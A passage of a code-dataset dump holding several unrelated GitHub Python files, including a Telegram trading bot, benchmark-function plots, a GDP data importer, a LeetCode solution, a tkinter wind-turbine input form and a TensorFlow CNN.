self.bb_boxes.copy(deep=True))","repo_name":"gregorej/computer-vision-playground","sub_path":"vehicle_recognition/data_sample.py","file_name":"data_sample.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14993680016","text":"\"\"\"Telegram transactions command\"\"\"\n\n# pylint: disable=unused-argument\n\nfrom telegram import ParseMode\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, \\\n ConversationHandler\nfrom rival_regions_calc import Value\n\nfrom handelsraad_bot import LOGGER, ITEMS, ITEMS_INV, database, util\nfrom handelsraad_bot.telegram_bot import transaction\n\n\nINSTRUCTIONS = \"\"\"```\n/sell \n/buy \n/add \n```\nbijvoorbeeld:\n```\n/sell uranium 1kk 2000\n/add uranium 1kk 2kkk\n/buy oil 10kkk 190\n/add oil 10kkk -1900kkk```\"\"\"\n\n\ndef print_transaction(update, context):\n \"\"\"Print transaction\"\"\"\n index = 1\n total_money = 0\n transaction_msg = [\n 'Transaction omschrijving: \"{}\"'.format(\n context.user_data['transaction']['description']\n ),\n 'Details:',\n '```',\n ]\n for detail in context.user_data['transaction']['details']:\n transaction_msg.append(\n '{}: {:>8} {:10} $ {:>8}'.format(\n index,\n str(detail['amount']),\n ITEMS_INV[detail['item_id']],\n str(detail['money'])\n )\n )\n index += 1\n total_money += detail['money']\n\n transaction_msg.append('```')\n transaction_msg.append('Totaal geld: $ {}'.format(Value(total_money)))\n\n update.message.reply_text(\n '\\n'.join(transaction_msg),\n parse_mode=ParseMode.MARKDOWN\n )\n\n\ndef conv_transaction_start(update, context):\n \"\"\"Start message\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, CMD start',\n update.message.from_user.username\n )\n if not util.check_permission(\n update, ['trader', 'chairman'], 'CONV add_transaction'\n ):\n return ConversationHandler.END\n update.message.reply_text('Stuur de beschrijving voor transactie:')\n\n return TRANSACTION\n\n\ndef conv_transaction_ask_details(update, context):\n \"\"\"Transaction ask details\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, description: \"%s\"',\n update.message.from_user.username,\n update.message.text\n )\n context.user_data['transaction'] = {\n 'telegram_username': update.message.from_user.username,\n 'telegram_id': update.message.from_user.id,\n 'description': update.message.text,\n 'details': [],\n }\n update.message.reply_text(\n 'Voeg transactie details toe.\\n' + INSTRUCTIONS,\n parse_mode=ParseMode.MARKDOWN\n )\n\n return DETAIL\n\n\ndef conv_transaction_detail_add(update, context):\n \"\"\"Add transaction detail\"\"\"\n command = update.message.text.split(' ')[0]\n LOGGER.info(\n '%s: CONV add_transaction, CMD %s',\n update.message.from_user.username,\n command\n )\n try:\n item_id = ITEMS[context.args[0]]\n except (IndexError, KeyError):\n LOGGER.warning(\n '%s: CONV add_transaction, CMD %s, incorrect item name',\n update.message.from_user.username,\n command\n )\n update.message.reply_text('Probleem met .')\n update.message.reply_text(\n '{} '.format(command)\n )\n return DETAIL\n\n try:\n if command == '/sell':\n amount = Value(-abs(Value(context.args[1])))\n elif command == '/buy':\n amount = Value(abs(Value(context.args[1])))\n except (IndexError, ValueError):\n LOGGER.warning(\n '%s: CONV add_transaction, CMD %s, incorrect amount',\n update.message.from_user.username,\n command\n )\n update.message.reply_text('Probleem met .')\n update.message.reply_text(\n '{} '.format(command)\n )\n return DETAIL\n\n try:\n price = Value(context.args[2])\n except (IndexError, ValueError):\n LOGGER.warning(\n '%s: CONV add_transaction, CMD %s, incorrect price each',\n update.message.from_user.username,\n command\n )\n update.message.reply_text('Probleem met .')\n update.message.reply_text(\n '{} '.format(command)\n )\n return DETAIL\n\n if command == '/sell':\n price = abs(amount * price)\n elif command == '/buy':\n price = -abs(amount * price)\n\n context.user_data['transaction']['details'].append({\n 'item_id': item_id,\n 'amount': amount,\n 'money': Value(price),\n })\n\n print_transaction(update, context)\n\n update.message.reply_text(\n 'Voeg meer details toe '\n 'of verwijder details met: `/remove `. '\n 'Sla de transactie op met: `/save`.',\n parse_mode=ParseMode.MARKDOWN\n )\n\n return DETAIL\n\n\n# def conv_transaction_detail_buy(update, context):\n# \"\"\"Add buy transaction detail\"\"\"\n\n\n# def conv_transaction_detail_add(update, context):\n# \"\"\"Add transaction detail\"\"\"\n\n\ndef conv_transaction_detail_remove(update, context):\n \"\"\"Remove transaction detail\"\"\"\n try:\n index = int(context.args[0]) - 1\n except (IndexError, ValueError):\n update.message.reply_text(\n 'geeft detail nummer te verwijderen '\n 'met: `/remove `.',\n parse_mode=ParseMode.MARKDOWN\n )\n return DETAIL\n\n try:\n context.user_data['transaction']['details'].pop(index)\n except IndexError:\n update.message.reply_text(\n 'Sorry, die index bestaat niet.'\n )\n return DETAIL\n\n update.message.reply_text(\n 'Transactie detail verwijderd. '\n 'Voeg meer details toe '\n 'of verwijder details met: `/remove `. '\n 'Sla de transactie op met: `/save`.',\n parse_mode=ParseMode.MARKDOWN\n )\n print_transaction(update, context)\n\n return DETAIL\n\n\ndef conv_transaction_save(update, context):\n \"\"\"Save transaction\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, CMD save',\n update.message.from_user.username\n )\n\n if len(context.user_data['transaction']['details']) == 0:\n update.message.reply_text(\n 'Oelewapper! '\n 'Je hebt geen transactie details toegevoegd.\\n' + INSTRUCTIONS,\n parse_mode=ParseMode.MARKDOWN\n )\n return DETAIL\n\n database.save_transaction(context.user_data['transaction'])\n\n update.message.reply_text('Transaction opgeslagen')\n context.user_data.clear()\n\n transaction.cmd_transactions(update, context)\n\n return ConversationHandler.END\n\n\ndef conv_transaction_cancel(update, context):\n \"\"\"Cancel transaction\"\"\"\n LOGGER.info(\n '%s: CONV add_transaction, CMD cancel',\n update.message.from_user.username\n )\n update.message.reply_text('Transaction gecanceld.')\n context.user_data.clear()\n\n return ConversationHandler.END\n\n\nTRANSACTION, DETAIL = range(2)\n\n\n# add transaction conversation\nconversation = ConversationHandler(\n entry_points=[\n CommandHandler(\n 'add_transaction',\n conv_transaction_start\n )\n ],\n states={\n TRANSACTION: [\n MessageHandler(\n Filters.text,\n conv_transaction_ask_details\n )\n ],\n DETAIL: [\n CommandHandler(\n 'sell',\n conv_transaction_detail_add\n ),\n CommandHandler(\n 'buy',\n conv_transaction_detail_add\n ),\n CommandHandler(\n 'add',\n conv_transaction_detail_add\n ),\n CommandHandler(\n 'remove',\n conv_transaction_detail_remove\n ),\n CommandHandler(\n 'save',\n conv_transaction_save\n ),\n ]\n },\n fallbacks=[\n CommandHandler(\n 'cancel',\n conv_transaction_cancel\n )\n ]\n )\n","repo_name":"joostsijm/handelsraad_bot","sub_path":"src/handelsraad_bot/telegram_bot/add_transaction.py","file_name":"add_transaction.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15999328357","text":"from mpl_toolkits import mplot3d\nimport numpy as np\nfrom math import *\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n \ndef draw(function, bound, title):\n x = np.linspace(-1*bound, bound, 100)\n y = np.linspace(-1*bound, bound, 100)\n \n X, Y = np.meshgrid(x, y)\n Z = function([X, Y])\n \n fig = plt.figure()\n ax = plt.axes(projection ='3d')\n ax.plot_wireframe(X, Y, Z, color ='green')\n ax.set_title(title)\n \n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, cmap=cm.jet,\n linewidth=0, antialiased=False)\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n\n plt.show()\n \n\n\ndef f_ackley(position, a=20, b=0.2, c=2*pi):\n d = len(position)\n\n sum1 = 0\n sum2 = 0\n for pos in position:\n sum1 = sum1 + pos**2\n sum2 = sum2 + cos(c*pos)\n\n term1 = -a * exp(-b*sqrt(sum1/d))\n term2 = -exp(sum2/d)\n\n return term1 + term2 + a + exp(1)\n\ndef f_f2(position):\n d = len(position)\n sum = 0\n\n for ii in range (1, d+1):\n xi = position[ii-1]\n sum = sum + (xi-ii)**2\n\n return sum\n\ndef fitnessFunc(chromosome):\n\t\"\"\"F6 Griewank's function\n\tmultimodal, symmetric, inseparable\"\"\"\n\tpart1 = 0\n\tfor i in range(len(chromosome)):\n\t\tpart1 += chromosome[i]**2\n\t\tpart2 = 1\n\tfor i in range(len(chromosome)):\n\t\tpart2 *= cos(float(chromosome[i]) / sqrt(i+1))\n\treturn 1 + (float(part1)/4000.0) - float(part2)\n \ndef f_griewank(position):\n d = len(position)\n sum = 0\n prod = 1\n\n x1 = position[0]\n x2 = position[1]\n sum = (x2**2)/4000 + (x2**2)/4000\n xd1 = x1 / sqrt(1)\n prod = cos(xd1) + cos(xd1)\n # for ii in range(0, d):\n # xi = position[ii]\n # sum = sum + (xi**2)/4000\n # prod = prod * cos(xi/sqrt(ii+1))\n\n return sum - prod + 1\n\n\ndef f_rastrigin(position):\n d = len(position)\n sum = 0\n\n for ii in range(1, d+1):\n xi = position[ii-1]\n sum = sum + (xi**2 - 10*cos(2*pi*xi) + 10)\n\n return sum\n\n\ndef f_rosenbrock(position):\n d = len(position)\n sum = 0\n\n for ii in range(1, d):\n xi = position[ii] #x i+1\n xii = position[ii-1] #x i\n sum += 100*((xi**2)-xii)**2+(1-xi)**2\n \n return sum\n \ndef f_schwefel(position):\n d = len(position)\n sum = 0\n prod = 1\n\n for ii in range(1, d+1):\n xi = position[ii-1]\n sum = sum + xi**2\n prod = prod * abs(xi)\n\n return sum + prod\n\n\ndef f_sphere(position):\n d = len(position)\n sum = 0\n\n for ii in range (1, d+1):\n xi = position[ii-1]\n sum = sum + xi**2\n\n return sum\n\n \ndef f_zakharov(position):\n d = len(position)\n sum1 = 0\n sum2 = 0\n\n for ii in range(1, d+1):\n xi = position[ii-1]\n sum1 = sum1 + xi**2\n sum2 = sum2 + 0.5*ii*xi\n \n return sum1 + sum2**2 + sum2**4\n\n\n\n\n \ndraw(f_sphere, 100, \"Funkcja Sphere\")\ndraw(f_f2, 100, \"Funkcja F2\")\ndraw(f_rosenbrock, 2.048, \"Funkcja Rosenbrock\")\n# draw(fitnessFunc, 600, \"Funkcja Griewank\")\n# draw(f_rastrigin, 5.12, \"Funkcja Rastrigin\")\n# draw(f_ackley, 32, \"Funkcja Ackley\")\ndraw(f_schwefel, 10, \"Funkcja Schwefel\")\ndraw(f_zakharov, 10, \"Funkcja Zakharov\")","repo_name":"pawelciupka/particle-swarm-optimization-test-app","sub_path":"functions/drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31535409999","text":"import requests\nimport json\nimport pandas as pd\nfrom datetime import date\nimport psycopg2\nfrom sqlalchemy import create_engine\n\n###############################\n## Start by getting GDP data ##\n###############################\nresponse_api = requests.get(\n \"http://api.worldbank.org/v2/country/all/indicator/NY.GDP.MKTP.CN?date=1950:2022&format=json&per_page=150000\"\n)\n\ndata_json=response_api.json()\n# convert json format to dataframe\ndf_gdp = pd.json_normalize(\n data_json[1], meta=['value', 'country', 'date', 'countryiso3code']\n) \n\n# rename column names and remove nas\ndf_gdp = df_gdp[['countryiso3code', 'date', 'value']].rename(\n columns={\n 'value':'GDP_lcu'\n }\n)\n\ndf_gdp['date'] = pd.to_numeric(df_gdp['date'])\ndf_gdp.dropna(inplace=True)\n\n\n######################################################### \n### For Taiwan we need to get the data from IMF API as ##\n### it is not published by the World Bank. ##\nresponse_api = requests.get(\n \"https://www.imf.org/external/datamapper/api/v1/NGDPD/TWN\"\n)\n\ndata_json=response_api.json()\ndate = list()\ncountryiso3code = list()\nGDP = list()\n\nfor key in data_json['values']['NGDPD']['TWN'].keys():\n date.append(key)\n countryiso3code.append(\"TWN\")\n GDP.append(data_json['values']['NGDPD']['TWN'][key])\n\ndf_gdp_taiwan = pd.DataFrame(\n {\n \"countryiso3code\": countryiso3code,\n \"date\":date,\n \"GDP_lcu\":GDP\n }\n)\n\n## Note that I cannot find an appropriate API for conversion, so for TAIWAN \n## the conversion is given in terms of dollars.\n\n## Concatenate df_gdp_taiwan with df_gdp\nif \"TWN\" in pd.unique(df_gdp['countryiso3code']).tolist():\n ...\nelse:\n df_gdp = pd.concat(\n (\n df_gdp,\n df_gdp_taiwan\n ),\n ignore_index=True\n )\n\n\ndf_gdp.loc[:,\"date\"] = pd.to_datetime(df_gdp.loc[:,\"date\"], format=\"%Y\").dt.date\n\n## send to database\nengine = create_engine(f'postgresql://{\"postgres\"}:{\"password\"}@{\"localhost\"}:{5432}/{\"country-db\"}')\ndf_gdp.to_sql('gdp', engine, if_exists='replace')\nengine.dispose()","repo_name":"koba96/index-tracker","sub_path":"import-gdp-data.py","file_name":"import-gdp-data.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25837223259","text":"\"\"\"\nYou are climbing a staircase. It takes n steps to reach the top.\n\nEach time you can either climb 1 or 2 steps.\n\nIn how many distinct ways can you climb to the top?\n\nExample 1:\nInput: n = 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\n\nExample 2:\nInput: n = 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\nConstraints:\n 1 <= n <= 45\n\nLearning:\n- Better to create an internal additional method\n- Brute force approach implemented in Solution 1 using recursion. O(2^n). Possible\n optimization would be adding memoization (a dict of already known step results)\n- Alternatively and more optimal would be Dynamic Programming with O(n), solution 2.\n It breaks the problem into subproblems\n\"\"\"\n\n\nclass Solution1:\n def climbStairs(self, n: int) -> int:\n return self._climbStairs(0, n)\n\n def _climbStairs(self, i, n):\n if i > n:\n return 0\n elif i == n:\n return 1\n sol = self._climbStairs(i + 1, n) + self._climbStairs(i + 2, n)\n print(\"sol:\", sol)\n return sol\n\n\nclass Solution2:\n def climbStairs(self, n: int) -> int:\n if n == 1:\n return 1\n sol = [0] * (n + 1)\n sol[1], sol[2] = 1, 2\n\n for i in range(3, n + 1):\n sol[i] = sol[i - 2] + sol[i - 1]\n return sol[n]\n\n\n# Recursion\nsol = Solution1().climbStairs(n=2)\nprint(sol == 2)\n\nsol = Solution1().climbStairs(n=3)\nprint(sol == 3)\n\nsol = Solution1().climbStairs(n=4)\nprint(sol == 5)\n\n\n# Dynamic Programming\nsol = Solution2().climbStairs(n=2)\nprint(sol == 2)\n\nsol = Solution2().climbStairs(n=3)\nprint(sol == 3)\n\nsol = Solution2().climbStairs(n=4)\nprint(sol == 5)\n\nsol = Solution2().climbStairs(n=5)\nprint(sol == 8)\n","repo_name":"eherrerosj/mle-tech-interviews","sub_path":"data-structure-challenges/leetcode/70. Climbing Stairs.py","file_name":"70. Climbing Stairs.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"25938111619","text":"'''Sistema para acréscimo de nota\nConforme combinado com os estudantes:\n-Aluno com nota azul no trabalho recebe um ponto na média\n-Aluno com nota vermelha no trabalho perde 0,5 ponto na prova mensal\n-Com a média azul sendo par o aluno recebe uma caneta azul de prêmio,\ncaso seja ímpar recebe uma caneta preta.'''\n\nprint('Sistema para acréscimo de nota')\np1=float(input('Entre com a nota da prova mensal: '));\np2=float(input('Entre com a nota da prova semestral: '));\ntrab=float(input('Entre com a nota do trabalho: '));\n\nmedia=((p1*3.0)+(p2*4.5)+(trab*2.5))/10\npremio=media%2.00\n\nif p1>=0 and p1<=10.00 and p2>=0 and p2<=10.00 and trab>=0 and trab<=10.00:\n if trab>=6.00 and media!=10.00:\n media+=1 \n if media>=10:\n media=10\n print('A média do aluno é: %.2f' %media)\n if media>=6.00:\n if premio==0:\n print('Aluno ganha caneta azul')\n else:\n print('Aluno ganha caneta preta')\n else:\n print('Aluno não ganha prêmio')\n elif trab<=6.00:\n p1=p1-0.5\n print('A média do aluno é: %.2f' %media)\n if media>=6.00:\n if premio==0:\n print('Aluno ganha caneta azul')\n else:\n print('Aluno ganha caneta preta')\n else:\n print('Aluno não ganha prêmio')\nelse:\n print('Os valores das notas são inválidos!')\n\n\n \n\n\n\n \n","repo_name":"GGreenBow/Python-Facul","sub_path":"Atividades Avaliativas/Trabalho 1/T1_Q4.py","file_name":"T1_Q4.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23209163198","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nx = np.array([80, 85, 90, 95, 100, 105, 110, 115, 120, 125])\r\ny = np.array([240, 250, 260, 270, 280, 290, 300, 310, 320, 330])\r\n\r\nplt.plot(x, y)\r\nFONT1={'family':'serif','color':'green','size':'20'}\r\nFONT2={'family':'serif','color':'yellow','size':'40'}\r\n\r\nplt.xlabel(\"Average Pulse\",fontdict=FONT1)\r\nplt.ylabel(\"Calorie Burnage\",fontdict=FONT2)\r\nplt.title(\"shanwaz\")\r\nplt.show()","repo_name":"Sohail-yt/Practising-for-jobs","sub_path":"Learning/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12501088362","text":"import tkinter as tk\nfrom tkinter import filedialog, messagebox\nimport os\n\ndef get_user_values():\n root = tk.Tk()\n\n # Funktion zum Speichern der Werte und Beenden der GUI\n def save_values():\n\n global p_req, roughness_length, p_min, single_cell_energy, single_cell_cost, interest_rate, lifetime, capex, save_path_powerdata, data_power_curve_path, data_tech_path, data_wind_path\n p_req = float(entry_p_req.get())\n roughness_length = float(entry_roughness_length.get())\n p_min = float(entry_p_min.get())\n single_cell_energy = float(entry_single_cell_energy.get())\n single_cell_cost = float(entry_single_cell_cost.get())\n interest_rate = float(entry_interest_rate.get())\n lifetime = int(entry_lifetime.get())\n capex = float(entry_capex.get())\n save_path_powerdata = entry_save_path_powerdata.get()\n data_power_curve_path = var_data_power_curve_path.get()\n data_tech_path = var_data_tech_path.get()\n data_wind_path = var_data_wind_path.get()\n\n root.destroy()\n\n root.title(\"Eingabewerte\")\n root.geometry(\"400x550\") # Vergrößert die Höhe des Fensters\n\n # Label und Eingabefelder\n label_p_req = tk.Label(root, text=\"Jahresenergiebedarf (kWh):\")\n label_p_req.pack()\n entry_p_req = tk.Entry(root)\n entry_p_req.insert(tk.END, \"85000\")\n entry_p_req.pack()\n\n label_roughness_length = tk.Label(root, text=\"Rauigkeitslänge (m):\")\n label_roughness_length.pack()\n entry_roughness_length = tk.Entry(root)\n entry_roughness_length.insert(tk.END, \"0.1\")\n entry_roughness_length.pack()\n\n\n label_p_min = tk.Label(root, text=\"Mindestleistung des Systems (kW):\")\n label_p_min.pack()\n entry_p_min = tk.Entry(root)\n entry_p_min.insert(tk.END, \"0.300\")\n entry_p_min.pack()\n\n label_single_cell_energy = tk.Label(root, text=\"Batteriezellkapazität (kWh):\")\n label_single_cell_energy.pack()\n entry_single_cell_energy = tk.Entry(root)\n entry_single_cell_energy.insert(tk.END, str(5120 / 1000))\n entry_single_cell_energy.pack()\n\n label_single_cell_cost = tk.Label(root, text=\"Batteriezellkosten (€):\")\n label_single_cell_cost.pack()\n entry_single_cell_cost = tk.Entry(root)\n entry_single_cell_cost.insert(tk.END, \"1700\")\n entry_single_cell_cost.pack()\n\n label_interest_rate = tk.Label(root, text=\"Zinssatz:\")\n label_interest_rate.pack()\n entry_interest_rate = tk.Entry(root)\n entry_interest_rate.insert(tk.END, \"0.04\")\n entry_interest_rate.pack()\n\n label_lifetime = tk.Label(root, text=\"Betriebsdauer (a):\")\n label_lifetime.pack()\n entry_lifetime = tk.Entry(root)\n entry_lifetime.insert(tk.END, \"20\")\n entry_lifetime.pack()\n\n label_capex = tk.Label(root, text=\"Capex (€/kW):\")\n label_capex.pack()\n entry_capex = tk.Entry(root)\n entry_capex.insert(tk.END, \"4500\")\n entry_capex.pack()\n\n\n label_data_wind_path = tk.Label(root, text=\"Pfad Windgeschwindigkeitsmessung:\")\n\n label_data_wind_path.pack()\n var_data_wind_path = tk.StringVar(root)\n data_wind_files = [f for f in os.listdir('weatherdata') if os.path.isfile(os.path.join('weatherdata', f))]\n var_data_wind_path.set('Wetterdaten_Wanna_Szenario_1.txt')\n dropdown_data_wind_path = tk.OptionMenu(root, var_data_wind_path, *data_wind_files)\n dropdown_data_wind_path.pack()\n \n label_save_path_powerdata = tk.Label(root, text=\"Speicherpfad Leistungsdatei:\")\n label_save_path_powerdata.pack()\n \n entry_save_path_powerdata = tk.Entry(root)\n entry_save_path_powerdata.insert(tk.END, r'data/Wetterdaten_Wanna_Szenario_1.xlsx')\n entry_save_path_powerdata.pack()\n \n # Eingabefeld mit doppelter Breite\n entry_save_path_powerdata.config(width=40) \n\n\n label_data_power_curve_path = tk.Label(root, text=\"Pfad zur Leistungsdatei:\")\n label_data_power_curve_path.pack()\n var_data_power_curve_path = tk.StringVar(root)\n data_power_curve_files = [f for f in os.listdir('data') if os.path.isfile(os.path.join('data', f))]\n var_data_power_curve_path.set('powercurves_interpolated.csv')\n dropdown_data_power_curve_path = tk.OptionMenu(root, var_data_power_curve_path, *data_power_curve_files)\n dropdown_data_power_curve_path.pack()\n\n\n label_data_tech_path = tk.Label(root, text=\"Pfad zur Technologiedatei:\")\n label_data_tech_path.pack()\n var_data_tech_path = tk.StringVar(root)\n data_tech_files = [f for f in os.listdir('data') if os.path.isfile(os.path.join('data', f))]\n var_data_tech_path.set('technical_information.xlsx')\n dropdown_data_tech_path = tk.OptionMenu(root, var_data_tech_path, *data_tech_files)\n dropdown_data_tech_path.pack()\n\n\n # Speichern-Button\n button_save = tk.Button(root, text=\"Speichern\", command=save_values)\n button_save.pack()\n\n root.mainloop()\n\n # Rückgabe der eingegebenen Werte\n return (\n float(p_req),\n float(roughness_length),\n float(p_min),\n float(single_cell_energy),\n float(single_cell_cost),\n float(interest_rate),\n int(lifetime),\n float(capex),\n os.path.join(save_path_powerdata),\n os.path.join('data', data_power_curve_path),\n os.path.join('data', data_tech_path),\n os.path.join('weatherdata', data_wind_path)\n )\n","repo_name":"joda9/Windenergieanlage","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71094727912","text":"import tensorflow as tf\nimport numpy as np\nimport re\nfrom datetime import datetime\nimport google.auth\nimport io\nimport os\nfrom oauth2client.client import GoogleCredentials\nfrom google.cloud import vision\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom crop_face import FaceDetector\nimport matplotlib\nmatplotlib.use('TkAgg') # For Max Users\nimport matplotlib.pyplot as plt\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nFLAGS.image_size = 96\nFLAGS.image_color = 3\nFLAGS.maxpool_filter_size = 2\nFLAGS.num_classes = 5\nFLAGS.batch_size = 100\nFLAGS.learning_rate = 0.0001\nFLAGS.log_dir = './logs_prediction/'\n\n\ndef get_input_queue(csv_file_name, num_epochs=None):\n train_images = []\n train_labels = []\n for line in open(csv_file_name, 'r'):\n cols = re.split(',|\\n', line)\n train_images.append(cols[0])\n # 3rd column is label and needs to be converted to int type\n train_labels.append(int(cols[2]))\n\n input_queue = tf.train.slice_input_producer([train_images, train_labels],\n num_epochs=num_epochs, shuffle=True)\n\n return input_queue\n\n\ndef read_data(input_queue):\n image_file = input_queue[0]\n label = input_queue[1]\n\n image = tf.image.decode_jpeg(tf.read_file(image_file), channels=FLAGS.image_color)\n\n return image, label, image_file\n\n\ndef read_data_batch(csv_file_name, batch_size=FLAGS.batch_size):\n input_queue = get_input_queue(csv_file_name)\n image, label, file_name = read_data(input_queue)\n image = tf.reshape(image, [FLAGS.image_size, FLAGS.image_size, FLAGS.image_color])\n\n # random image\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_brightness(image, max_delta=0.5)\n image = tf.image.random_contrast(image, lower=0.2, upper=2.0)\n image = tf.image.random_hue(image, max_delta=0.08)\n image = tf.image.random_saturation(image, lower=0.2, upper=2.0)\n\n batch_image, batch_label, batch_file = tf.train.batch([image, label, file_name], batch_size=batch_size)\n # ,enqueue_many=True)\n batch_file = tf.reshape(batch_file, [batch_size, 1])\n\n batch_label_on_hot = tf.one_hot(tf.to_int64(batch_label),\n FLAGS.num_classes, on_value=1.0, off_value=0.0)\n return batch_image, batch_label_on_hot, batch_file\n\n\n# convolutional network layer 1\ndef conv1(input_data):\n # layer 1 (convolutional layer)\n FLAGS.conv1_filter_size = 3\n FLAGS.conv1_layer_size = 16\n FLAGS.stride1 = 1\n\n with tf.name_scope('conv_1'):\n W_conv1 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv1_filter_size, FLAGS.conv1_filter_size, FLAGS.image_color, FLAGS.conv1_layer_size],\n stddev=0.1))\n b1 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv1_layer_size], stddev=0.1))\n h_conv1 = tf.nn.conv2d(input_data, W_conv1, strides=[1, 1, 1, 1], padding='SAME')\n h_conv1_relu = tf.nn.relu(tf.add(h_conv1, b1))\n h_conv1_maxpool = tf.nn.max_pool(h_conv1_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv1_maxpool\n\n\n# convolutional network layer 2\ndef conv2(input_data):\n FLAGS.conv2_filter_size = 3\n FLAGS.conv2_layer_size = 32\n FLAGS.stride2 = 1\n\n with tf.name_scope('conv_2'):\n W_conv2 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv2_filter_size, FLAGS.conv2_filter_size, FLAGS.conv1_layer_size, FLAGS.conv2_layer_size],\n stddev=0.1))\n b2 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv2_layer_size], stddev=0.1))\n h_conv2 = tf.nn.conv2d(input_data, W_conv2, strides=[1, 1, 1, 1], padding='SAME')\n h_conv2_relu = tf.nn.relu(tf.add(h_conv2, b2))\n h_conv2_maxpool = tf.nn.max_pool(h_conv2_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv2_maxpool\n\n\n# convolutional network layer 3\ndef conv3(input_data):\n FLAGS.conv3_filter_size = 3\n FLAGS.conv3_layer_size = 64\n FLAGS.stride3 = 1\n\n print('## FLAGS.stride1 ', FLAGS.stride1)\n with tf.name_scope('conv_3'):\n W_conv3 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv3_filter_size, FLAGS.conv3_filter_size, FLAGS.conv2_layer_size, FLAGS.conv3_layer_size],\n stddev=0.1))\n b3 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv3_layer_size], stddev=0.1))\n h_conv3 = tf.nn.conv2d(input_data, W_conv3, strides=[1, 1, 1, 1], padding='SAME')\n h_conv3_relu = tf.nn.relu(tf.add(h_conv3, b3))\n h_conv3_maxpool = tf.nn.max_pool(h_conv3_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv3_maxpool\n\n\n# convolutional network layer 3\ndef conv4(input_data):\n FLAGS.conv4_filter_size = 5\n FLAGS.conv4_layer_size = 128\n FLAGS.stride4 = 1\n\n with tf.name_scope('conv_4'):\n W_conv4 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv4_filter_size, FLAGS.conv4_filter_size, FLAGS.conv3_layer_size, FLAGS.conv4_layer_size],\n stddev=0.1))\n b4 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv4_layer_size], stddev=0.1))\n h_conv4 = tf.nn.conv2d(input_data, W_conv4, strides=[1, 1, 1, 1], padding='SAME')\n h_conv4_relu = tf.nn.relu(tf.add(h_conv4, b4))\n h_conv4_maxpool = tf.nn.max_pool(h_conv4_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv4_maxpool\n\n\n# fully connected layer 1\ndef fc1(input_data):\n input_layer_size = 6 * 6 * FLAGS.conv4_layer_size\n FLAGS.fc1_layer_size = 512\n\n with tf.name_scope('fc_1'):\n # 앞에서 입력받은 다차원 텐서를 fcc에 넣기 위해서 1차원으로 피는 작업\n input_data_reshape = tf.reshape(input_data, [-1, input_layer_size])\n W_fc1 = tf.Variable(tf.truncated_normal([input_layer_size, FLAGS.fc1_layer_size], stddev=0.1))\n b_fc1 = tf.Variable(tf.truncated_normal(\n [FLAGS.fc1_layer_size], stddev=0.1))\n h_fc1 = tf.add(tf.matmul(input_data_reshape, W_fc1), b_fc1) # h_fc1 = input_data*W_fc1 + b_fc1\n h_fc1_relu = tf.nn.relu(h_fc1)\n\n return h_fc1_relu\n\n\n# fully connected layer 2\ndef fc2(input_data):\n FLAGS.fc2_layer_size = 256\n\n with tf.name_scope('fc_2'):\n W_fc2 = tf.Variable(tf.truncated_normal([FLAGS.fc1_layer_size, FLAGS.fc2_layer_size], stddev=0.1))\n b_fc2 = tf.Variable(tf.truncated_normal(\n [FLAGS.fc2_layer_size], stddev=0.1))\n h_fc2 = tf.add(tf.matmul(input_data, W_fc2), b_fc2) # h_fc1 = input_data*W_fc1 + b_fc1\n h_fc2_relu = tf.nn.relu(h_fc2)\n\n return h_fc2_relu\n\n\n# final layer\ndef final_out(input_data):\n with tf.name_scope('final_out'):\n W_fo = tf.Variable(tf.truncated_normal([FLAGS.fc2_layer_size, FLAGS.num_classes], stddev=0.1))\n b_fo = tf.Variable(tf.truncated_normal(\n [FLAGS.num_classes], stddev=0.1))\n h_fo = tf.add(tf.matmul(input_data, W_fo), b_fo) # h_fc1 = input_data*W_fc1 + 